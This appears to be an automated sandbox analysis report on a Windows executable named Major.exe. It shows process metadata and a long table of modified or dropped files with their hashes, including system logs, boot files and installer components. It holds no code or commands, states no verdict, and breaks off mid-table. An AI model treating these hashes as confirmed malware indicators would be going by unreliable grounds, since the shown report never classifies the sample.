Major.exe
Windows Exe (x86-32)
Created at 2019-05-04T07:12:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: major.exe
28545
2
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\fd1hvy\desktop\major.exe |
| Command Line | "C:\Users\FD1HVy\Desktop\Major.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:01:04, Reason: Analysis Target |
| Unmonitor | End Time: 00:05:04, Reason: Terminated by Timeout |
| Monitor Duration | 00:04:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdc4 |
| Parent PID | 0x860 (c:\windows\explorer.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C58
0x
704
0x
D9C
0x
200
0x
D1C
0x
7CC
0x
DC0
0x
F4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| major.exe | 0x00400000 | 0x0046CFFF | Content Changed | - | 32-bit | 0x0046BBF0 |
|
|
|
| major.exe | 0x00400000 | 0x0046CFFF | Relevant Image | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\FD1HVy\Desktop\Major.exe | 186.00 KB |
MD5:
09ddb987239bb1f836e7a3b0fc23dc34
SHA1: f459fca5615fb4af9c6537f82b94fef1d2fa207c SHA256: ac67a4eeabc6aeac8fdd63cd6d29d8332e3695f979268950eb42aa16b76ea9a6 SSDeep: 3072:aucMmQpL6iToem5Ep2JRONV+NAT8k6R86juydSAfzpUMVOb48nzELBto:xGuWiMvOORONV+NAT6Hii9zpto8kQro |
|
|
| \BOOTSECT.BAK | 8.39 KB |
MD5:
c121a3bdd16b848f52c7a89b576cd01d
SHA1: a361a5ee250d086b842e5edfa0ddca8e7df3f185 SHA256: 55087f0241e8fbbe1c921ac2a1a0710c8567031645bc42a32a61acccbe3933e5 SSDeep: 192:9wKuFo71Q08xjOFRKyuV5iKbYwApiG3tKERSzkwWnOGaXbqDw:9XuFqq0kjOFgyufiFddcklPaXbqE |
|
|
| \588bce7c90097ed212\SetupUi.xsd | 29.80 KB |
MD5:
b76480b9ddb1d1f4026aa41256307721
SHA1: 615714d695e549964396f93793ecc9e21f976226 SHA256: ddb9583d16abce714d8f5368a763ab33650fb8648d93bff1b7ee1b7bcdd591d1 SSDeep: 768:ZdzSJWpMiezlN9EzysYTaTUQw+yan9gCWPlnCyWhlg:ZhSCMi2lYz2Tbj9a9yCySg |
|
|
| \588bce7c90097ed212\netfx_Extended_x86.msi | 484.39 KB |
MD5:
c488b1dcedb108b628ab23fdaef91f62
SHA1: 006166538fcd85e920801465c73e5297ad8ac960 SHA256: 360ea720802a1f8b836d6d034b3ea01ecebc624511f2a30b553a7928f867b95f SSDeep: 12288:kkvkOGqewdf/sDBx6TDhBUYnucd6juerRUJaq0zEvtrj:kg6wdf/sDBx8DMcdBerRCapQv9 |
|
|
| \588bce7c90097ed212\netfx_Core_x86.msi | 1.11 MB |
MD5:
9cf70d3468b4e1786691ebcb87cba8ff
SHA1: dfd792e5e72e7adbb386bdbf9378879af6270c1d SHA256: 380bf8e7eb780250f66c8e56ba36568dec2514c5c6475cf889eb1e3381d3b214 SSDeep: 24576:qzOOKdvwzUtRMFu7DEal/bjVFug9YnE56+9Ka0nfpiMEPcuHn:qSNwzHFS5/lFvYnE5/9KaoUMEPjn |
|
|
| \588bce7c90097ed212\DHtmlHeader.html | 16.13 KB |
MD5:
9e30a0bc0475ad1c01a74fc4bc34bd02
SHA1: 14d06df87c55e496aad859c9378531abbdb2c6f7 SHA256: 69341013be503d71386e30ca608b541dd4794faa003421a865d10a85847c583e SSDeep: 384:yluXUcbiaYHj5QK5KNFjfJYniChDoRLgqSpSJ9:AuluaYHj5jCjfJYnqS4T |
|
|
| \Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx | 68.39 KB |
MD5:
80e46ca123c7dd364794f4790374b798
SHA1: 27ba1ecbe82659ca1f5969f5ec076a24c847ac27 SHA256: 4b5191f027966dd3b9b99e52fb5d71118ce894314ab473789be2495bd51229ff SSDeep: 1536:oHF/XZbQAP7DK1go1o4sfoLuHywOMmGOCFoXM0N:ol/XZbQAjKgyuS5MmiFUL |
|
|
| \Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx | 68.39 KB |
MD5:
678474d8f1a0d25d629a0a535dbc7cd3
SHA1: 1a786ca48f189582a0a605a3a5bd64646dd43c2e SHA256: 0f097f086d022116e8497de15931e5ac24aff10090f28ddc3f33d16693e28ebb SSDeep: 1536:Gv888k1U1fMWaDw8plkur1vveE6+yG1VZHI5rm2wmdE1UmH/c9Qh:Z8xOxapl5K+PnWtGUec9Qh |
|
|
| \Logs\Microsoft-Windows-NCSI%4Operational.evtx | 68.39 KB |
MD5:
30b8b4fe8613d095bf940d790d2e5d73
SHA1: 11bbca2aed56114ef2753c572a538a1410147ef0 SHA256: c7d0458472e73fb9dc334c1e9f95adb288aba092fe12c10ba8011be413e28511 SSDeep: 1536:Z+mRHYWnbHzsuOHQYWuoggtcsnOTP4zXcIWDgkG0sjedwHi532:8mJYWbHAPqg6FOL4zcIiTGhWwHK2 |
|
|
| \Logs\Microsoft-Windows-MUI%4Operational.evtx | 68.39 KB |
MD5:
e9f95e5237010563d9e5936426e43e6a
SHA1: f2422b77d5dc8fd60ef15bbc55df766f366da79a SHA256: 46e0427fcb78f5be95d9db705f91f957f28d03e7f7482f22847741fce094e590 SSDeep: 1536:ZuxObJIABHiFsmcxx33cF867mH70VVK8nKpnGxreVO8+Cisiw3:Zu8bJVBHiF5cxxod780VVK5GxreI8P |
|
|
| \Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx | 68.39 KB |
MD5:
4a4c4aaa9508106ab06a3c1251df6e2a
SHA1: d7dd30ae7b0ace14ebb8caf5b1be5f63ed5b4565 SHA256: 4e28c2aa7cae4eadce0e6d651bf197ee1950e47184d5d761cdb9cf25d864381d SSDeep: 1536:36RUFvp64HSK7s41tbRdrJEBoZQFjInwbflO4GWeOYEL2Tu:3/FvN1tbRdrCBoKunwbflO4GtU |
|
|
| \Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx | 68.39 KB |
MD5:
80b3e2931ec55da4707c1f86917ab06c
SHA1: 92c1aff31bb549b51a0d5a7435f47d7bddb2acfb SHA256: 54a99ad6434afc3d2fb49d0639a0d2ff9f5d11385e90120b2fa6342c9dce953e SSDeep: 1536:XL1n20uXSRzC38fphb3Ua68f4+LHTkmI+xz:XL1n3uiRe38fLbffrTT |
|
|
| \Logs\Microsoft-Windows-AppReadiness%4Operational.evtx | 1.07 MB |
MD5:
ea50086d99f697401f1d42c22a91c9c3
SHA1: 05fbefacb9a0b3c8d23829dfd595db6d43dd1178 SHA256: a5d0810ab4bd74ba38b5ed52fd522a5f1817c299c9ab3b49b40fe27a00dbd9e2 SSDeep: 24576:Cu+zAN4M6ke6QvUDvnoi0KAZd9WFONxKWNwZtOIRkv4Q:Cu+xkPN0KAZd9WFMchA4Q |
|
|
| \Logs\HardwareEvents.evtx | 68.39 KB |
MD5:
b50661213cb886c82218b80f83c18b97
SHA1: 4f2ceb6891874a58610c65ad2fb0c46809c1106d SHA256: d3fa408d78d4c05e0c22c4413b7c9f2169a38c5e3aa74717b1eee5c9f50403a7 SSDeep: 1536:2ukzZj72e+26/1arGu+js4+EzQf8eCkbkGsVGWFDbfHwsJ+1ju:29lI1aUj3MfezG0FDbX+1ju |
|
|
| \Logs\Application.evtx | 68.39 KB |
MD5:
d50119ad4f2d551b925df8ef9354e116
SHA1: 732a67d3e026720b793885cce112103e7e9585f1 SHA256: 16cd558140761972d757eadba56a2082b99bc65d5da7a9ae8cb31255df5e5351 SSDeep: 1536:j+4QN9NRIWdrpupTSpkpd+c4u4YJeXAVRYk+BDZszDP1R0ddZl:C4ONSWdkpg0+e4YJeXiRYk+5Zszrgl |
|
|
| \Windows10Upgrade\wimgapi.dll | 544.58 KB |
MD5:
9ef43d490782096544b584bec7d64680
SHA1: 5aaaa4ff00131527bd98b8d88914e6d9627f5dec SHA256: a916bc0e71cfc0ac7844fd5f465db2c3dfefe19de363da4382207f8ff174b0cd SSDeep: 12288:w6Yk6hb+7UjD3rVZAToRWcV/pLsyXztphPfeES0J3JrdZTF6Q5:LZ6Uo33r7ASWcV/p/tXk0JJrHTFV |
|
|
| \Windows10Upgrade\upgrader_win10.log | 20.45 KB |
MD5:
c95a9db13f717db79159f464a2f448c1
SHA1: 8eb7c596130406ef979991dff1bef08b67882624 SHA256: 8c9ca70fe028dec9883db82cf54ee006469fc186ca46a2f2ce91609d479b1bbd SSDeep: 384:fInckhZc6k2MekuQXgTLHQkG24t4xDxMBu2BoqonXmoyDq7eDkna:QcbvIBN4tK4WyDq7eDka |
|
|
| \Windows10Upgrade\DevInv.dll | 322.58 KB |
MD5:
8f6cfa4ea52f197aaf67a4aad972f03d
SHA1: 0fc00ca6b92a8282913e4b4b95b1e9f48bac4e41 SHA256: 6c3bfd91abc4223a5433784104102f95e5e43bf0b86ba25d1debb7e913d74ce5 SSDeep: 6144:81JTpCAFOUJH8X+VTzI6ek5ET8jh6fmxVcSa64To8bM07AkG:81JTpCY3J0+VVeRTOjV464To8oEG |
|
|
| \Windows10Upgrade\cosquery.dll | 60.58 KB |
MD5:
b7dcf0ffaec053b03b9c0e3337f27843
SHA1: b2e353bd945ff1cba171c0c6ffbf9657692a1c5c SHA256: 9f520a1867559f4cf7b3de771be2dd8862c6db9933a2cfdcd4380e616fd80aa2 SSDeep: 768:wj5fvjo+wTsUcnt0LP2jVbQD+zhM5UFnY4jaXalo2V+hcXESukFQT1az8pN8Rtbf:wj5IpetsD+IHFf2Tk1add8pzf0raZ0x |
|
|
| \588bce7c90097ed212\1035\SetupResources.dll | 18.22 KB |
MD5:
179425dfc704a3cbafbd7f45ea8442d3
SHA1: 555cbacc8af05c2f9ec55f1701857db3037bfd70 SHA256: 1c42090531495ed6fe324468b5746cf25e3845c33744b42c42def4d5703af148 SSDeep: 384:xrJrTP64hdVwAsUwJOxe+TS5umlKdQvNbNwNgIS9g:xr9NlwISF+6lmQvDwGIL |
|
|
| \BOOTNXT | 397 bytes |
MD5:
2615fdef617e913d3255f8b4a043834e
SHA1: a0a38bde75ece04ac44db656430f2c1cb456c5f0 SHA256: 2acf84fe21365d090df3c25bdf7cd8c850b0db7cfaabc45c66388c2245779419 SSDeep: 12:b/VbGG3kv9JcHLKHxBsNO7qB4X6C7TMcc:TViGhrKHxBx9qCEcc |
|
|
| \$WINRE_BACKUP_PARTITION.MARKER | 396 bytes |
MD5:
bb13f682a670f4dcf79747b5346502f9
SHA1: 0cd42767a567c22df798c302f09807a056ce8106 SHA256: 764eec74c2f6e69df5af52ec8159e38dd5d92d90ab6e9facd87d3cc13092633e SSDeep: 6:iP7SEyC66WpqzhuqjS0Q9wFeUtSUQVwurKzbf+nf1XKDI1Wi5bzx/WOSM01gO:iT8MRS0FeUZQyurObfO16s1Wi5PxzGH |
|
|
| \588bce7c90097ed212\Windows6.1-KB958488-v6001-x86.msu | 2.04 MB |
MD5:
644670312c7b1cb2a5ab762a2d32edfa
SHA1: 8d32b1963f6804374d56f24c0761713a299ca246 SHA256: b90895400c808e39eae2194672f0ff174511600f2c14916a32fbd4041717243b SSDeep: 49152:38VYsp+JwkL4ONKjNMYhtf9WDuJde9NHpW:MaNwkEmKNhtfsuJ4HQ |
|
|
| \588bce7c90097ed212\Windows6.1-KB958488-v6001-x64.msu | 4.86 MB |
MD5:
8db96637efa959a4fb07797970b9b944
SHA1: b7d57b4ae562d1a1128d760ffac5427efb68ae38 SHA256: 067f91b93f3d4405141fa4a5891f0b6f69a500077210e2f19f971478bf7e2539 SSDeep: 98304:HZsJmH3m2q5iD94MDe9CxPQ4p0EuTs/A05YRoWvz+nBgiZQe86Su:5OmHnqgLi9CxPQK5YqW6xjSu |
|
|
| \588bce7c90097ed212\Windows6.0-KB956250-v6001-x86.msu | 2.09 MB |
MD5:
29d4bfa4f04c0fc6717149de3d5150d6
SHA1: ea772b7f3553d746e7171d563995f33633aeea87 SHA256: 34028c6fa4d32bcbc101f34ccd2e0164770cf402795d7447b0e4d1bec462bad8 SSDeep: 49152:DCu6DcmdIvf78TIMz9gWFEG1XIXe2u8BdBXlt10OIeHDk:F6DIAlNT8e2uCnIb |
|
|
| \588bce7c90097ed212\Windows6.0-KB956250-v6001-x64.msu | 4.96 MB |
MD5:
21d091a0785cc178cb8a542d1d6e7a6b
SHA1: 74dc357dd6431bb8b686343ee10350a5995468b1 SHA256: 71aee3fc353ab19050177894b1bda14ad479426965df1b126c36bed2dda7a929 SSDeep: 98304:Hyu1eCeF6+lKlHdn8nugC2fjVrhTFVKRRd6TYglztxwX1Ml5N59gxo/:HHHKhWHdn8rC2fjVid6TYw4Kl5982 |
|
|
| \588bce7c90097ed212\watermark.bmp | 102.02 KB |
MD5:
28f67baf4494aef26eefdc9e1fc80130
SHA1: eabe969de19fe3db4aad457dc8f896ed19f96f1c SHA256: f6ed7ff2475d11d1d8a4f9fa44b8ea42a9564b5a2f8c42b3cce4fd5886c4b5df SSDeep: 3072:duBzlhjnODfZWIy/xcFhsjVzqpAYVRUys5Io0Yf:duThK0IWxcsxGbCIG |
|
|
| \588bce7c90097ed212\UiInfo.xml | 38.37 KB |
MD5:
3892ef0d9fdb97a2f4b718629d64778e
SHA1: 9d79fbbfcfa5647e4b1edb6f5bc978e80e41ae8a SHA256: af16de64f50b4fbe816763197707a60ecb456145bc0936241f550791f434ec58 SSDeep: 768:gvjPbmSbKRXM2IfgOVMlVgJLtdMxcIry52KQxpfq5qIGbxx1K2l:vrRM2esPgJ5dwrynQ+q5bYs |
|
|
| \588bce7c90097ed212\Strings.xml | 14.14 KB |
MD5:
9c467e9fa7bcb6a68f4de136415c2156
SHA1: d6ab564a6dfd1764c36536b7544a4f36930b0631 SHA256: 867fb2361fa374f9d5b79d63f908bcd28c94f9370aa167fbf2c33b0377bf5236 SSDeep: 384:zbqzyEf4biIBSakEBNFzbGZ4VB/eUXfjbgMzQCaDY:zb2yEf4bi4lzba4/pXrsMzn |
|
|
| \588bce7c90097ed212\sqmapi.dll | 141.42 KB |
MD5:
7e7466dd63b08ec4f7ad69f5cc0586b9
SHA1: 1829aa2f00a009d0055a297ac1772f741776ba9b SHA256: 68f38a03a742fc0c559ed189348d9f75d1eb625e5e8fa0eaa7445cd4540ddb62 SSDeep: 3072:eMBzbxYbumrYfcBmSpnQoiOfN4KPtRSQlXKAM805P+E:FNmrgoQoigUAJqx |
|
|
| \588bce7c90097ed212\SplashScreen.bmp | 40.50 KB |
MD5:
b0406716dd64e2b54caed88797a6db94
SHA1: d9f71cc96b3cbc46c06b4621bb7cc6ade39b4b7d SHA256: 16d3c24e9478484fccbd8512373da7fac615d5a41931da79545cc4cb580ff7de SSDeep: 768:RAFNzB5F9FxmOcWqOrcKF1rr/oPSyHMM+Bxt3mv7RxBDE:Rw157FsxmjfoPNoWxBDE |
|
|
| \588bce7c90097ed212\SetupUtility.exe | 94.22 KB |
MD5:
91bfb6f586d59c43d28f63e0a6b1a00a
SHA1: 701d629697118e4201b5c30f052ac6994385c52b SHA256: 197a89cd9ae6a512b085a8e93697b7bc95cb8a3a83947fbe410015647ab16e06 SSDeep: 1536:dM/BwrFTIzisM03HfQ9WIWkAWmN451afCUgdbdQWlQC7cH89/OZ9OF9fEz6I3:epCTsaWvWmNwofCUgddm80Z9OfC33 |
|
|
| \588bce7c90097ed212\SetupUi.dll | 288.71 KB |
MD5:
9dbe7ea9dba23c887a90bb8088e3e8b8
SHA1: 96b2a47aac1483a6d027158b06ff89623b83754c SHA256: 5a75aa46cb7ba427c3c05b4e58df12655b04c4d2143a35f14b02aa7c7d7fe39f SSDeep: 6144:5JlmsOrMRP0B6kNuk/32mILV5JXSSprJqHnuTox:NmsmgP0kaH2mMBSSpcMG |
|
|
| \588bce7c90097ed212\SetupEngine.dll | 788.72 KB |
MD5:
19137a59a9bd26910841f50bf714b54c
SHA1: 9e57d5def699924ea55982aea318d781666a8730 SHA256: 4d64911645243d22d7d86f76e428a22c8c4662cd64f474e54f0896f6bb5f743c SSDeep: 12288:prVa/49OMzSxQYP8eHPRlu36CRf5QmpGvomDIQK3qXePK5ICJQRDQ2YZmbZCjMpu:plaxhHq36YxpmUQ15ICJigjMXiB |
|
|
| \588bce7c90097ed212\Setup.exe | 76.71 KB |
MD5:
b36350386a63d2ab6afffd1bd3c6b117
SHA1: 519c8749ad1fa041c5b40103d353f171a5d91b1b SHA256: 2dabea9eb1f75a0afe1b0704f7db76cb6e8bbeb7ec8d3ebe336d4cf35d04bbb3 SSDeep: 1536:/BlL+bwotWCw8AoPIVlQmc3j75NbvhO8UtG/uHmb9wojGZM16y2VQFkhpXBJRjr:/Bl+j/w8w34P5NbJOHpXojmMqdxJB |
|
|
| \588bce7c90097ed212\RGB9Rast_x86.msi | 92.89 KB |
MD5:
675d16aa4f3c81188d6fb8e8c5f5da34
SHA1: 98dfbba34a14794864cc71da6219ad3107474bd9 SHA256: aa330c9f9f427d23aaa06ad72ea4c3516a898f19e3513dcbb57d7daca136750a SSDeep: 1536:IXGOlu6U+JUqrCMIBBpMpGpWaSrsyhTnk3eCBY30hsyeeN/gCpRZjWsOZR:zrh8UqzGuGpWaSrvDB0hsVe9b/jWNT |
|
|
| \588bce7c90097ed212\RGB9RAST_x64.msi | 180.89 KB |
MD5:
7537776f31d04635816e98b3f0d0021f
SHA1: 268b6950eaa90c5eff2c99fab534d506b7da9839 SHA256: 90511ec8b37f843cefde673d2673771e8720574ff383f454bc39b302b2752842 SSDeep: 3072:5asPcB/yW4kR4TZAMWvcFE4pZiKq8xAqcpJc1e4XAW2uxIrnOkaFz0dYGTj3:h+KW4WecU7xhAF4X6POrGH |
|
|
| \588bce7c90097ed212\ParameterInfo.xml | 266.06 KB |
MD5:
b4c4a8c05732f6bc75b8128a20030ba1
SHA1: 5135bf30f9effbe406118b860f359ec48693db15 SHA256: d02413d3a35c408194ce956297a9b4ce3b9dda163d6f8892e282b74e7a686254 SSDeep: 6144:YApohmxLdoob+38LlGQjqj7NhgOB9sx/tj1Wi8ptvwrgXA:bm0xRol38LlGQjapea9ytZWi2N+gw |
|
|
| \588bce7c90097ed212\netfx_Extended_x64.msi | 852.39 KB |
MD5:
5bd8ca894411e50c8fc30f6f15f47cf2
SHA1: 4f004d711822622843c8b99a244bde08b8d86e2e SHA256: 1df473b064912642e72336719e86f9d2b7b91a18b0deb3db883a5552633dc7b8 SSDeep: 24576:vtNvvxL+jlDdYNaAwPwDax0p664lx/W+Ty2:vjHtMdYNVYq6H/W2R |
|
|
| \588bce7c90097ed212\netfx_Extended.mzz | 41.13 MB |
MD5:
a088a5d64413102fa19a40ab0ed9f119
SHA1: a01de71287ae56619cc1c285502c9f3eb0fc9130 SHA256: 56b45de21e46e7c9e80cb4695a79631ee06fc3859351c2dfa8f56959044e4eec SSDeep: 196608:jIAnonT7So5SMCWVK5+f9jck7+aN34HYroDphD+LjCile3T+sjl81Rq7KN:jIAfo5/DVKQljc4hIeShCSilXsjlnm |
|
|
| \588bce7c90097ed212\netfx_Core_x64.msi | 1.81 MB |
MD5:
433501c94bacea016a1c85b64a300e4b
SHA1: dd9400cc0c2a9ce3c3eea0342503a72ee277d0df SHA256: ffe387eb428c0bc3d6b1b3f2b10bb901f301acb4ea8aed2a9474fc31487de6da SSDeep: 49152:Rd7DvQQOOWcwPUy14TyrhRgLV8Pwia24VlxAHMS0ts+woZ:RF4MW3PxSlLCPK24VlxAD3XoZ |
|
|
| \588bce7c90097ed212\netfx_Core.mzz | 173.08 MB |
MD5:
585f314cca4ff5d4351d1391f1ad9bc5
SHA1: caa825db72f1a5d22c6a626bc388cbea5fae4dcd SHA256: 2d74c3ccb9ee3cc8efdf89b6f9b019629c25beb94f36ebdb585bb833f2bcb7c3 SSDeep: 196608:dy+kOPPyOIbsC8IQJFd0s+749ZH8KBioRwPhFOmcNJhitk/8VJcqkxyl:fkOPPnfiG0s+7aJ0oRwvEXitk/iaxx0 |
|
|
| \588bce7c90097ed212\header.bmp | 3.93 KB |
MD5:
1834412bf925eb177071eb054dfaf275
SHA1: c96ae6ea663d6e14622b20c1ed5a6fcff0b1056a SHA256: 8c51b9b0ae89f8e18c4b7c4910e4eea06a2f57504364acae199215bd341d1178 SSDeep: 96:LJYr7k4/yiI79G/48VsWrcvyJ7CmCDBdILTwSj51KZsCT4Fo:LW3Xe9GgcEvmCDXswQ5msCT4Fo |
|
|
| \588bce7c90097ed212\DisplayIcon.ico | 86.84 KB |
MD5:
3420e0df34a3ae0724c972bb124bead0
SHA1: 9403ad2e78ad4dd1bb22ee2e543032c005f71113 SHA256: 7d8614e94848d7c5eee4e48e3dcebf0fad633cf42089a8690d3111a0e7f838d2 SSDeep: 1536:UyV0Jm31GxZkdEhrzEZr93ANVtGFn2pCELOQcp7+6QmaMh+vQW:r0AGJZz83YGxKk+6Jh+vz |
|
|
| \Boot\BOOTSTAT.DAT | 64.39 KB |
MD5:
8d7b8270600c899c20556c00414ca9b3
SHA1: 11c095322ba55e50582c3c14c22bae37ba4b554f SHA256: 8f70b0b15600a24aaa18a19215598fc28e7165c1420ccaa33a131e5ea7937d1e SSDeep: 1536:svQEBcQaTVPk+KXtePHvOQvWQhmUkCC1HcKPqWSCel:sv/qGteXPvmv18KPqWSCel |
|
|
| \Boot\BCD.LOG2 | 396 bytes |
MD5:
8bf59eebd9a11bc6eb915efce255cd75
SHA1: 4f8f74838e7ed7ffd6f20dcfdce21cea53fa1e34 SHA256: eedefaa4222e0254f2a00b89cdc788b3d3962ad517664815371938b5f8e4a562 SSDeep: 6:iP4sqCVpvQxBCCPi8Yqn04qpwhuk6YCsnK1M2cEYeCutTd3EobgO:igszTQX11n0w0k611M2qeTd3Ekl |
|
|
| \Boot\BCD.LOG1 | 396 bytes |
MD5:
71b3c080a5139d7007073f6164f650da
SHA1: c316ec1febb9c3620197fb3fe438f1fbc117caec SHA256: 2e49d51fd3aa7708c2d814bb63f616065e4cb38402a6d08c14c86e676b1a1d5d SSDeep: 12:icJmuLBnN6FSSjx7TucKKO73erncaCL/H:bFmhjx7TucRgpam/H |
|
|
| \Logs\Windows PowerShell.evtx | 68.39 KB |
MD5:
c4ccec086f5e2f34c7240bf16119ec2a
SHA1: eb52afc217bd15a942dbda344db3226d21a37b52 SHA256: 2e3a25d7ba299031487736d976a3559d63e3376747c076f49b937b6f022c2e9d SSDeep: 1536:G409W/HX8qhLijcKmsyUxt+7G5yEDZVOTdfzOA9wzPb/gUq6D5GY:AyHX8qpijDmszt+7G5yQZV0zOd/gU9v |
|
|
| \Logs\System.evtx | 1.07 MB |
MD5:
ff48b415961007ef8fa1f74b18654e5c
SHA1: 488f95de90ceff8879a4f57f585e3232c9e01fb3 SHA256: 5bdd9cddb737667e822914275e0bc81b74209fd27494e2a7ab2f21bb28bb1b34 SSDeep: 24576:wnmTyoCmKbGRIW7nOj7x6wJ4kX7VeUJXHuXWJysWX66Ov/:wnmy5HZWo9zGkxFJ0WJBWTOn |
|
|
| \Logs\Setup.evtx | 68.39 KB |
MD5:
fb00ae2eaa72b586bb9e8df07014ae4c
SHA1: 3af4c6905be0ff5570a474596902bbfc3ab62bba SHA256: e749a1c3345d777550f67b057600f53411784a284e3b562d3b8bb69dc4466d61 SSDeep: 1536:N7SydM4LRxNx+/eA3268M2F/Y221DTYMbKTjux4OwoAVE6/Hd3:ZSydNLR4/p38M2F/YNHJKTf1VESN |
|
|
| \Logs\Security.evtx | 1.07 MB |
MD5:
879cc00405500419e9e272d8639f8505
SHA1: 0c6f835a994c0dcf67c7ee14f649d6c3a489f2a5 SHA256: e7b102f75a19ef96c51dc208b79900c0bfdd8467022cf7fca21411ad36614cdd SSDeep: 24576:2shSSeBuIEc8eu+zcnucDbExAmwXuhG3/26MsbyjX7Ko9qfpR+hih4gsQdf:2sTLeu4HcDeU326xbItAqih4wf |
|
|
| \Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx | 1.00 MB |
MD5:
15bb5c0aa398facb32222621c40a849b
SHA1: 3d657eda0aa2d2780d9be3e58c5a54b0d994fe58 SHA256: 8dbae2dc98e62ad6edc0439de58a1d41379baba3ce6cdce13a4f0fdd1fd783ef SSDeep: 24576:z0/mogpYVk5k/Wo0oD7sdkSlGle72VzAx22SXb8MEFduAdY4q1c6yQxw:gmoKYae7sdxGc74zAx2yWcY4kw |
|
|
| \Logs\Microsoft-Windows-Winlogon%4Operational.evtx | 68.39 KB |
MD5:
dadbddabf1d00edc559656f4dd409f86
SHA1: 93d9945c81b6c44a790f8a387988bb5e3ab4e7de SHA256: 32b9b3b917fa88bb77a8d39c98485b07076165530d3d70d61e80ad8d807c9269 SSDeep: 1536:d0Ezt7BdYuNVq4Msv+KTXW/hDwQ8m3cFC5wX4H1OpEPUBksfEyjtV:d0qdPg4Me+KTIhh8dFCWX4HlIffXtV |
|
|
| \Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx | 68.39 KB |
MD5:
c73afff583fa27abe65d97746b92b71f
SHA1: 0ec8570934c01c8aab8ccec54aa77b3e61a81e56 SHA256: 84a6907af8198af71cc4c9355fc3d20ff2dbff7933b3566cb4d98d052622b8c8 SSDeep: 1536:HEOJtBNydNyYcu1JH11xor6woDdvvNpkuusQe8N:xtBNyfyZ2foVoRn8uujN |
|
|
| \Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx | 1.00 MB |
MD5:
cba8876af2506c22790c31e8ac479939
SHA1: 3822b6941e9eec866355af75e7f843e2adccd993 SHA256: 84bcee26d1e3a7f22b9f5c6be4ac5d594a4b5709b7264528b2f7bdec6531cfb1 SSDeep: 24576:zqqRNH1Lgc5J+VqXFjGJc0pkcHyw8z/K6ORjPaWav:zq8H1kc5IVqZwc6Swoy6ORjP5av |
|
|
| \Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx | 68.39 KB |
MD5:
345bc4e54128319e0b7a3ccdf57ec926
SHA1: 146cc9b8a35c28231c07f7e0dc22fe14eb5589ee SHA256: 8cb03ceac54136a1eb47e7101a22267f9988f631cd1e827144dfdaf3c701dc92 SSDeep: 1536:VPk15NstnEB9tNEP6WH6/FiRhvlYlKwCitm4xKVnUcBj:VPcbstEBFEPtHymlYlzBrcR |
|
|
| \Logs\Microsoft-Windows-Windows Defender%4WHC.evtx | 68.39 KB |
MD5:
3737b9605ad7e6ac8db7656f6fda5f14
SHA1: 5799c7ff67572ef17e8b0ab30faed7129edf154b SHA256: cc81e0fb3c87ac2ef9b88cb747452b8937d66737c7c5aad22bfcde2ef3c62feb SSDeep: 1536:cz/Wmnxzvb9t2uKhiFxtf3digb6kbAQ+sF0dTevTEi/BCU:cbWmxzDzUMXtf3Yg3kCF0QvIMBR |
|
|
| \Logs\Microsoft-Windows-Windows Defender%4Operational.evtx | 68.39 KB |
MD5:
75d4c9426c3d8f2a7f1c3a80317afe91
SHA1: e2b319a8c29fd7f8e9aa700691d591a60eefd5b2 SHA256: efcff0c9a83caa747d859b1329c7207371838ed706e55050551a634e608b5d93 SSDeep: 1536:XLST/MO6qcC0VnDiGvUH39lViepDG3ZTt2NW:XLSTiqF8rvUHtl/6ic |
|
|
| \Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx | 68.39 KB |
MD5:
a6a1fbe565e35855a7302c54f3678c83
SHA1: 150785195190a6647c1811d8394c1af028a8b43e SHA256: 6e41eeff085c7db98bd4a71808a9ee5a5a2dcd5b6257e07cd886e0600f34cec1 SSDeep: 1536:LDn2aT4fgasVtGPcTJnj8aQRpR72qiGIkAsZ16t900R4UP4J:LD7kgasVtGPGn8RT72qisx16T0G4mS |
|
|
| \Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx | 68.39 KB |
MD5:
dee79b33dd56130a2cb733c2d187bc97
SHA1: d85b85fdb4b1f05e175500f97ecdc8ed6f7de197 SHA256: 189b6ffd695f1a1d66b6442785899ee9928f1eb8212b3e6769ebba3a9dec6102 SSDeep: 1536:iIt/Mo8CJ1+Y7T/loMU762j/1BLTf9pgCu0TdeDryQP1:7/Mo8I+Y7ce2j3TgnHz1 |
|
|
| \Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx | 68.39 KB |
MD5:
12b90763255471ac98c9f92ae5d07ba8
SHA1: 97ae9642777e0930f855e0a5f75c08ca1cc555b0 SHA256: 21c6b8bef9dce5c2f1a3e770df42937d2e464bba41274783ad3a1b6f6b1cb34f SSDeep: 1536:uDZmnuM3LkvVTtT2REU/KcSL4D5TD31eBM5pghHjMJy43q:uDgnt3LktTtT2RECKcA4D5vsBM5pgljl |
|
|
| \Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx | 68.39 KB |
MD5:
4a65b83b88b6e72d77cc7eaed0245d1f
SHA1: 4385316045abacd789e8eddc1a89ed4cf7784105 SHA256: b05da7ef2c8bc9162c35f954ad82ed5e65cec42c1cf6a0133297cfd774dc50b4 SSDeep: 1536:hSYGYos8lgsyDBM9TOuQg+h9b2ypBLpwGR2SNkblt3:P7dsyDuyphN2wpVNkbX3 |
|
|
| \Logs\Microsoft-Windows-User Profile Service%4Operational.evtx | 68.39 KB |
MD5:
0b08a506c5f18cc890b8cd84df988602
